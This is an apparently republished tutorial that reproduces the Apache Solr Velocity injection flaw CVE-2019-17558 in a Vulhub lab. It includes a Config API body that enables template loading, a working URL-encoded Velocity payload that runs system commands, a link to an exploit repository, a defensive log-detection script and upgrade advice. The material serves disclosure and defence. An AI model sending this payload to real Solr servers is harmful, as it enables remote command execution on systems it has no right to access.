
How to analyze Apache Solr Velocity injection remote command execution vulnerability CVE-2019-17558

2025-02-28 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

Many readers do not know how to analyze the Apache Solr Velocity injection remote command execution vulnerability CVE-2019-17558, so this article summarizes the cause of the problem, how to reproduce it and how to fix it. I hope it helps you solve this problem.

0x00 Introduction

Solr is an open-source enterprise search server whose core is implemented in Java and is easy to extend and modify. Clients communicate with the server over standard HTTP and XML, so knowing Java is useful but not necessary for using Solr.

Solr's main features are powerful full-text retrieval, highlighting of search results, dynamic clustering, a database interface and processing of electronic documents (Word, PDF, etc.). Solr is also highly extensible and supports replication for distributed search and indexing.

0x01 Vulnerability overview

Apache Solr versions 5.0.0 through 8.3.1 contain an input validation error. An attacker can exploit it through a Velocity template to execute arbitrary code on the system.

0x02 Affected versions

Apache Solr 5.0.0 ~ 8.3.1

0x03 Environment setup

1. Vulhub is used to build this environment. Download it with:

git clone https://github.com/vulhub/vulhub.git

2. Download it to a virtual machine that has a Docker environment, enter the directory and pull the image:

cd vulhub-master/solr/CVE-2019-17558/

docker-compose up -d

3. When the green "done" appears, the image has been pulled successfully. Open http://your-ip:8983 in the browser.

0x04 Vulnerability reproduction

1. The params.resource.loader.enabled option is off by default, so custom templates cannot be used. First list all cores through the following API (in vulhub the core is demo):

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

2. Enable params.resource.loader.enabled: capture the request to /solr/demo/config with Burp, change the method to POST, change Content-Type to application/json, and send the following body to modify the startup configuration (template.base.dir is left empty):

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

3. Any command can then be executed through the Velocity template, for example:

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

4. A Python script can also be used to exploit the vulnerability; run it with python3. One such script is in the repository below (many similar scripts can be found on GitHub):

https://github.com/zhzyker/exphub
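As an added defender's example (not part of the original post or the Solr project), the following Python checks cover the two observable stages of the reproduction above: a Config API write that turns the Velocity resource loaders on, and a select request that passes wt=velocity with an inline v.template.* parameter. The /solr/<core>/config response shape and the combined access-log format used for the constructed samples are assumptions.

```python
import json
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample inputs shaped after the write-up's requests (assumed
# /solr/<core>/config response shape and combined access-log format).
SAMPLE_CONFIG = json.dumps({"config": {"queryResponseWriter": {
    "json": {"class": "solr.JSONResponseWriter"},
    "velocity": {"class": "solr.VelocityResponseWriter", "startup": "lazy",
                 "params.resource.loader.enabled": "true"}}}})
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2020:10:01:02 +0000] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 311',
    '10.0.0.5 - - [31/May/2020:10:01:09 +0000] "POST /solr/demo/config HTTP/1.1" 200 50',
    '10.0.0.5 - - [31/May/2020:10:01:15 +0000] "GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27) HTTP/1.1" 200 76',
    '10.0.0.7 - - [31/May/2020:10:02:00 +0000] "GET /solr/demo/select?q=*:*&wt=json HTTP/1.1" 200 1200',
]

RISKY_FLAGS = ("params.resource.loader.enabled", "solr.resource.loader.enabled")
REQ_RE = re.compile(r'"(GET|POST) (\S+) HTTP/[\d.]+"')  # method, request target
CONFIG_PATH_RE = re.compile(r"^/solr/[^/]+/config/?$")


def audit_velocity_writer(config_json: str) -> List[str]:
    """One finding per VelocityResponseWriter whose resource loader is on:
    the Config API change the write-up makes before injecting a template."""
    cfg = json.loads(config_json).get("config", {})
    findings = []
    for name, writer in cfg.get("queryResponseWriter", {}).items():
        if "VelocityResponseWriter" not in str(writer.get("class", "")):
            continue
        for flag in RISKY_FLAGS:
            if str(writer.get(flag, "false")).lower() == "true":
                findings.append(f"writer {name!r}: {flag}=true")
    return findings


def classify_request(line: str) -> Optional[str]:
    """Label an access-log line, or None when it is not of interest."""
    m = REQ_RE.search(line)
    if not m:
        return None
    method, parts = m.group(1), urlsplit(m.group(2))
    if method == "POST" and CONFIG_PATH_RE.match(parts.path):
        return "config-api-write"  # body is not in the access log: review it
    qs = parse_qs(parts.query)
    if qs.get("wt", [""])[0].lower() == "velocity":
        if any(k.startswith("v.template") for k in qs):
            return "velocity-inline-template"  # template supplied in the URL
        return "velocity-writer-used"
    return None
```

Run audit_velocity_writer() against the JSON returned by each core's /config endpoint after patching, and feed classify_request() the access log to find who flipped the loaders and when the inline template was first used.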

0x05 Repair recommendation

1. It is recommended to upgrade Apache Solr to the latest version.

After reading the above, have you mastered how to analyze the Apache Solr Velocity injection remote command execution vulnerability CVE-2019-17558? If you want to learn more skills or know more about the topic, you are welcome to follow the industry information channel. Thank you for reading!
